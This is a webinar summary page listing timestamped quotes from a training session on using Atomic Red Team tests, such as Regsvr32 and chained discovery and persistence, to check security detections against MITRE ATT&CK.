Events & WebinarsAtomic Red Team
Casey Smith Michael Haag

How to Test Your Security Controls Using Atomic Red Team


Learn an easy way to start testing your defenses across MITRE ATT&CK.

Watch an in-depth training on Atomic Red Team, a suite of small, highly portable detection tests mapped to MITRE ATT&CK.

Attendees will learn how to:

  • Run a basic atomic test (Regsvr32)
  • Test defenses against a chained attack
  • Measure progress and impact

00:14 Presenter Introduction

00:56 Webinar Agenda

02:49 Lab 1 – Regsrv32

06:17 “This has become a fairly popular ATT&CK technique over the last year.” -Casey

06:22 “Regsrv32 is a default tool inside of Windows so it’s been with Windows since Windows XP all the way through to Windows 10” -Casey

08:47 “/i is simply a parameter to regsrv32 and this is where we actually pass the URL that we want to be executing into the system.” -Casey

14:51 Lab 1 – Questions & Answers

15:03 Question 1: How is regsrv32 different from rundll32?

15:58 “I would again drive you back to the MITRE framework. This framework has good distinctions about different techniques.” – Casey

17:29 Question 2: In any other security event logs, is there anything else within there that would trigger some kind of event that we could potentially correlate with Sysmon?

17:49 “I haven’t seen anything in any other logs at this point.” -Casey

18:15 Question 3: Is there a big difference when trying to detect this Sysmon versus EDR solutions?

19:02 “There are multiple ways to do it with both of these products.” -Mike

19:40 Lab 2 – Chain Reaction

19:45 “Rarely does a technique occur in isolation.” -Casey

21:18  “The next phase of this test would be the attack enumerates a bunch of different things in your environment.” -Casey

22:00 “The second chain the attacker is going to run is a long sequence of discovery commands. The next chain of attack would be line 21 where we can actually schedule attack tasks for example.” -Casey

25:29  “We have regsrv32 chained with a discovery chained with a persistence.” -Casey

25:50 Lab 2 – Questions & Answers

27:00  Question 1: Is the chaining technique effective over the long term? 

27:05  “Depending on scale, probably not… we’re really trying to get people started and batch files are the most simple way to do that.” -Casey

27:32  Question 2: Is there too much data to store across the full stack?

28:03 “Especially with Sysmon, you either collect everything or you filter out a lot of things and collect specific tasks that you’re executing.” -Mike

29:40 Lab 3 – Measuring Progress and Impact

32:49  “If I’m hunting one endpoint at a time, I’m not being completely effective.” -Mike

35:15  “You can pop over to the trends tab, and this is now where you can begin to see over time how you’ve been progressing.” -Mike

37:00 Lab 3 – Questions and Answers

37:05 Question 1: Have we automated the metrics with a SIM to automatically generate metrics?

37:19  “That’s going to depend on all of the different SIM platforms. I don’t know the best way to do that for everyone all at once.” -Mike

38:24  Question 2: Has there been any analytics ran against the MITRE framework?

38:39 “There probably has, but I’m not sure. That is something I will have to follow up with.” -Casey

38:53 Question 3: What are things coming down the pipe on this project?

39:00 “One of the things we have looked at is expanding our ATT&CK chains. Maybe we want to provide some ATT&CK chains that model after a particular actor.” -Casey

39:50  “We would also like to look to the community and provide feedback on things they would like to see or where we could add additional techniques.” -Casey

41:29  Question 4: Any other recommendations other than Carbon Black?

41:40  “This framework is designed to test multiple different products.” -Casey

42:04  Question 5: In terms of testing solutions, how does the heat map allow you to differentiate between the threat blocked, threat detected, and threat information available and gathered for hunting?

42:30  “You will need to build out the other sections of the spreadsheet or just use it as a way to validate.” -Mike

42:53  Question 6: Are we looking at the possibility of some techniques to show the value of disrupting chains so that the deception techniques and disruption logs detection capabilities?

43:05  “As an adversary, if you land in your environment and know your telemetry is being studied, there is certainly value in disrupting and degrading the performance of that telemetry.” -Casey

43:35  Question 7: With certain APTs focusing on certain verticals, are there cases based upon those verticals?

43:47  “We hope you would be able to build these chain reactions that are specific to your industry.” -Casey

Atomic Red Team adds tests for cloud and containers
Take action with the 2021 Threat Detection Report
Chain Reactor: Adversary Simulation on Linux
Testing adversary technique variations with AtomicTestHarnesses